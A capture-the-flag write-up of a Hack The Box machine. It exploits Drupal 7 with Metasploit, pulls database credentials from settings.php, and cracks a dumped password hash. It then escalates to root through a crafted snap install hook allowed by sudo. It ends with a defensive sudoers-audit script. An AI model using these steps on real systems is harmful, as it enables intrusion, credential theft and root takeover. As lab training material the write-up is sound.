![7d7d53d0b5f332b4cbafe6bdcd30c2ee.png](b81d625b23ad4bdda6d49bae5229a860.png)
### Port Scanning and General Enumeration (Nmap)
My **allports (-p-)** scan showed 22 and 80 open. Not much.
![b500616c4207aa9cc48e4190ddce65a9.png](c8b2e7e4adac4cf4a51efbe7b9e38c1e.png)
Tons of disallows in **robots.txt**, but nothing super interesting. **Drupal** version number though. Is 7 vulnerable to anything?
---
### Access (searchsploit, metasploit, drupal)
Let's check **searchsploit** for **Drupal 7**
![32204402cf361d87f0db376a0e51aeb7.png](64fe0432ded3489c8e55265dd8bc5c77.png)
Looks like there's a Ruby module for Metasploit.
1. `msfconsole`
2. `search drupal 7`
![a8c54725cf4f15cece3bc602969231b8.png](a28cc04e16084275a82ce29b3f116cdb.png)
3. `use 4`
4. `set lhost tun0`
5. `set rhosts MACHINEIP`
Using 4 we get a shell as 'apache' but it's really bad.
After some googling for locations, I found the **Drupal config file** located at `/var/www/html/sites/default/settings.php`
Database creds in that file!
![7d5d856adb4768adaee4eb2d25085625.png](10024dc310054ba6bef123649755e18b.png)
`mysql -u drupaluser -p`
Can't get output from mysql, but it's working.
1. `use drupal;`
2. `select name, pass from users;`
![a276807aedcd4404caaeabc316688f4d.png](0aebfe31d5134aa286c178d245e300bb.png)
Saved the hash and ran it through John
![975a6d61d816535119c9a3689af43b0c.png](1f431373095e4e5698cfb1d51fd351a5.png)
The cracked hash gave us the password for the **brucetherealadmin** account. SSH in and capture the user flag!
![8820ff079e8aac0f31a68576d74c2b64.png](511c5569be534af5ada9ae4055b575eb.png)
---
### Privesc (sudo, snap, fpm, gtfobins)
`sudo -l`
![4a316a471c7ac89a3ac67b6b6e65e36b.png](82b556430aa54bea8f3559024507f763.png)
GTFOBins entry for snap:
https://gtfobins.github.io/gtfobins/snap/
Follow the directions and use **fpm** to generate the file we need. However, before you upload it, edit the `/meta/hooks/install` file. Mine just cats the flag, but you can use whatever command you want.
```
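#!/bin/sh
# Install hook: runs as root while the snap is being installed.
# The trailing `false` makes the hook fail, so the install is aborted afterwards.
cat /root/root.txt; false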
```
![a5561409fd52d4bb237fbd8c7a5f4a26.png](5828895e7795493ea86ab12096caa8c5.png)
Root flag!
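
The privesc works because a sudo rule lets a non-root user run `snap install` as root, and a snap's install hook then executes as root. As an added example (not part of the original writeup), this is one way to audit sudoers-format text for such rules. The sample rules and user names are constructed, and the function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original writeup): report sudoers rules that
# let a user run `snap install` as root. Reads sudoers-format text on stdin.
# Limits: aliases and #include files are not resolved, and rules granting
# ALL commands are already full root, so they are not reported here.
audit_sudoers() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }                      # comments, blanks
    /^[ \t]*(Defaults|(User|Runas|Host|Cmnd)_Alias)/ { next }
    {
        eq = index($0, "=")
        if (eq == 0) next
        who  = $1
        spec = substr($0, eq + 1)
        auth = (spec ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
        # A missing (runas) list means root; skip rules limited to other users.
        if (match(spec, /\([^)]*\)/)) {
            runas = substr(spec, RSTART, RLENGTH)
            if (runas !~ /root|ALL/) next
            spec = substr(spec, 1, RSTART - 1) substr(spec, RSTART + RLENGTH)
        }
        gsub(/[A-Z_]+:/, "", spec)                         # drop tags
        n = split(spec, cmds, ",")
        for (i = 1; i <= n; i++) {
            c = cmds[i]
            gsub(/^[ \t]+|[ \t]+$/, "", c)
            m = split(c, w, /[ \t]+/)
            bin = w[1]; sub(/.*\//, "", bin)
            # Bare "snap" allows any subcommand; "snap install" is the risky one.
            if (bin == "snap" && (m == 1 || w[2] == "install"))
                printf "%s %s %s\n", who, auth, c
        }
    }'
}

# Constructed sample rules; user names are hypothetical.
sample_sudoers() {
    cat <<'EOF'
Defaults    env_reset
root        ALL=(ALL) ALL
deploy      ALL=(root) NOPASSWD: /usr/bin/systemctl restart httpd
webadmin    ALL=(root) NOPASSWD: /usr/bin/snap install *
backup      ALL=(backup) /usr/bin/snap install *
ops         ALL=(ALL : ALL) /usr/bin/snap list, /usr/bin/snap
EOF
}

sample_sudoers | audit_sudoers
```

Each output line gives the user, whether a password is required, and the matching command, so any hit is a rule to remove or replace with a narrower one.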
---
Tags: #htb #metasploit #johntheripper #hashcracking #snap